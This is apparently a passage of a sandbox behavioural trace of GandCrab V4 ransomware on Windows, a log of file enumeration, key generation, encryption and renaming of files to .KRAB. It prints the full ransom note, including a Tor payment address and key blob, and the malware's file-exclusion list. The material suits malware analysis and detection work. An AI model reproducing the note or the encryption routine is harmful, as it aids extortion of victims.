FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0101.157] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1 [0101.157] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1 [0101.157] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0101.157] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0101.157] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.158] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0101.158] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0101.158] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0101.158] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0101.158] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.158] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.158] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Libraries\\\\KRAB-DECRYPT.txt") returned 43 [0101.158] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\public\\libraries\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0101.161] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0101.161] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0101.162] CloseHandle (hObject=0x320) returned 1 [0101.162] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.162] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.163] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x165)) [0101.163] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.163] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.163] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.163] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Libraries\\d2ca4a08d2ca4dee3d.lock") returned 49 [0101.163] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\public\\libraries\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0101.164] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.164] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.164] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\") returned 26 [0101.164] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Libraries\\*") returned="C:\\Users\\Public\\Libraries\\*" [0101.164] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbe0a0 [0101.164] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0101.164] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.164] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0101.164] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0101.164] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.165] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0101.165] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0101.165] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Public\\Libraries\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Public\\Libraries\\d2ca4a08d2ca4dee3d.lock" [0101.165] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.165] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Libraries\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 54 [0101.165] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\d2ca4a08d2ca4dee3d.lock") returned 49 [0101.165] lstrlenW (lpString=".lock") returned 5 [0101.165] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.166] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0101.166] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.166] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.166] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.166] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0101.166] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0101.166] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Libraries\\desktop.ini") returned="C:\\Users\\Public\\Libraries\\desktop.ini" [0101.166] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.167] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Libraries\\desktop.ini.KRAB") returned 42 [0101.167] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\desktop.ini") returned 37 [0101.167] lstrlenW (lpString=".ini") returned 4 [0101.167] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.167] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0101.167] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.167] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\desktop.ini") returned 37 [0101.167] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\desktop.ini") returned 37 [0101.167] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0101.167] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.168] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.168] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0101.168] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0101.168] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Libraries\\KRAB-DECRYPT.txt") returned="C:\\Users\\Public\\Libraries\\KRAB-DECRYPT.txt" [0101.168] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.168] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Libraries\\KRAB-DECRYPT.txt.KRAB") returned 47 [0101.168] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\KRAB-DECRYPT.txt") returned 42 [0101.168] lstrlenW (lpString=".txt") returned 4 [0101.168] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.168] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0101.168] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.169] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\KRAB-DECRYPT.txt") returned 42 [0101.169] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\KRAB-DECRYPT.txt") returned 42 [0101.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0101.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0101.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0101.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0101.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0101.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0101.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0101.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0101.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0101.169] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0101.169] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.169] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.169] lstrcmpW (lpString1="RecordedTV.library-ms", lpString2=".") returned 1 [0101.170] lstrcmpW (lpString1="RecordedTV.library-ms", lpString2="..") returned 1 [0101.170] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="RecordedTV.library-ms" | out: lpString1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" [0101.170] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.170] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.KRAB") returned 52 [0101.170] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 47 [0101.170] lstrlenW (lpString=".library-ms") returned 11 [0101.170] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.170] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".library-ms ") returned 12 [0101.170] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.171] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 47 [0101.171] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 47 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="desktop.ini") returned 1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="autorun.inf") returned 1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ntuser.dat") returned 1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="iconcache.db") returned 1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="bootsect.bak") returned 1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="boot.ini") returned 1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ntuser.dat.log") returned 1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="thumbs.db") returned -1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="KRAB-DECRYPT.html") returned 1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="KRAB-DECRYPT.txt") returned 1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ntldr") returned 1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="NTDETECT.COM") returned 1 [0101.171] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="Bootfont.bin") returned 1 [0101.171] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.172] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011018) returned 1 [0101.172] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0101.172] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0101.173] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0101.173] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0101.173] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0101.173] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.173] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10112c0) returned 1 [0101.174] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0101.175] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0101.175] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0101.175] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0101.175] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0101.175] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.175] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011238) returned 1 [0101.176] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbe0e0) returned 1 [0101.176] CryptGetKeyParam (in: hKey=0xfbe0e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0101.176] CryptEncrypt (in: hKey=0xfbe0e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0101.176] GetLastError () returned 0x0 [0101.176] CryptDestroyKey (hKey=0xfbe0e0) returned 1 [0101.176] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0101.176] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0101.177] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbe0e0) returned 1 [0101.177] CryptGetKeyParam (in: hKey=0xfbe0e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0101.177] CryptEncrypt (in: hKey=0xfbe0e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0101.177] GetLastError () returned 0x0 [0101.177] CryptDestroyKey (hKey=0xfbe0e0) returned 1 [0101.177] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0101.194] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0101.194] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0101.195] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0101.195] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x3e7, lpOverlapped=0x0) returned 1 [0101.356] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffc19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.356] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x3e7, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x3e7, lpOverlapped=0x0) returned 1 [0101.356] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0101.356] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.367] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.367] CloseHandle (hObject=0x434) returned 1 [0101.367] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.368] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.KRAB" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.krab")) returned 1 [0101.374] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.374] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0101.374] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0101.374] CloseHandle (hObject=0x320) returned 1 [0101.374] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0101.374] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0101.374] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0101.375] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0101.375] lstrcatW (in: lpString1="C:\\Users\\Public\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0101.375] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.375] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0101.375] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0101.375] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0101.375] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0101.375] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.375] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.376] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Music\\\\KRAB-DECRYPT.txt") returned 39 [0101.376] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\\\KRAB-DECRYPT.txt" (normalized: 